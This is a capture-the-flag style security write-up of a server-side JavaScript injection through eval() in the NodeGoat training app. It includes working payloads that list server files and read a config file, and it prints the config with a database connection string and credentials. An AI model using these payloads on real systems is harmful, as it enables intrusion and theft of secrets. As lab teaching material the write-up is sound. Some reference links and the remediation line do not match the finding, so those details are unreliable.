## Version 1.4.1
## language: en

Feature:
  TOE:
    node-goat
  Category:
    Injection FS Access
  Location:
    http://localhost:4000/contributions
  CWE:
    CWE-73: https://cwe.mitre.org/data/definitions/73.html
    CWE-89: https://cwe.mitre.org/data/definitions/73.html
    CWE-89: https://cwe.mitre.org/data/definitions/89.html
    CWE-95: https://cwe.mitre.org/data/definitions/95.html
    CWE-94: https://cwe.mitre.org/data/definitions/94.html
  Rule: Fluid Attacks' non-compliant rule
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Get the connection string of the database
  Recommendation:
    Do not use eval() function to parse user inputs.

  Background:
  Hacker's software:
    | <Software name>     | <Version>       |
    | Windows 10          | 1809            |
    | Google Chrome       | 75.0.3770.100   |
  TOE information:
    Given I am accessing the site http://localhost:4000/
    And entered /contributions
    And the server is running Node.js

  Scenario: Normal use case
    When I enter in the contributions module
    Then I can change the percent of contribution

  Scenario: Static detection
    When I look at the code of file NodeGoat/app/routes/contributions.js:
    """
    26 var roth = eval(req.body.roth);
    """
    Then I see that the user input is not validated
    And use the eval() function
    Then I conclude that the site is susceptible to server side injection

  Scenario: Dynamic detection
    When I enter the following string in the Employee After Tax input:
    """
    13 = '432532'
    """
    Then the server interprets the expression
    And returns:
    """
    ReferenceError: Invalid left-hand side in assignment
    Oops..
    """
    Then I concluded that Employee After Tax input is a possible attack vector

  Scenario: Exploitation
    When I enter the following string in the Employee After Tax input:
    """
    res.end(require('fs').readdirSync('.').toString())
    """
    Then I get the list of files of the server:
    """
    .jshintrc,.nodemonignore,Gruntfile.js,LICENSE,Procfile,README.md,
    app,app.json,artifacts,config,cypress.json,node_modules,
    package-lock.json,package.json,server.js,test
    """
    When I enter the following string in the Employee After Tax input:
    """
    res.end(require('fs').readdirSync('config/env').toString())
    """
    Then I get the list of config files of the server:
    """
    all.js,development.js,production.js,test.js
    """
    When I enter the following string in the Employee After Tax input:
    """
    res.end(require('fs').readFileSync('config/env/all.js', 'utf8').
    toString())
    """
    Then I get the content of the config file:
    """
    // default app configuration
    module.exports = {
        port: process.env.PORT || 4000,
        db:  process.env.MONGOLAB_URI || process.env.MONGODB_URI ||
          "mongodb://nodegoat:owasp@ds159217.mlab.com:59217/nodegoat",
        cookieSecret: "session_cookie_secret_key_here",
        cryptoKey: "a_secure_key_for_crypto_here",
        cryptoAlgo: "aes256",
        hostName: "localhost"
    };
    """
    Then I can conclude that the vulnerability has been exploited

  Scenario: Remediation
    When I use an alternate method to eval:
    """
    25 var afterTax = parseInt(req.body.afterTax);
    """
    Then I enter the following string in the After Tax input:
    """
    res.end(require('fs').readFileSync('config/env/all.js', 'utf8').
    toString()))
    """
    And the site returns:
    """
    Invalid contribution percentages
    """
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.6/10 (High) - E:H/RL:W/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.8/10 (High) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date 2019-09-20
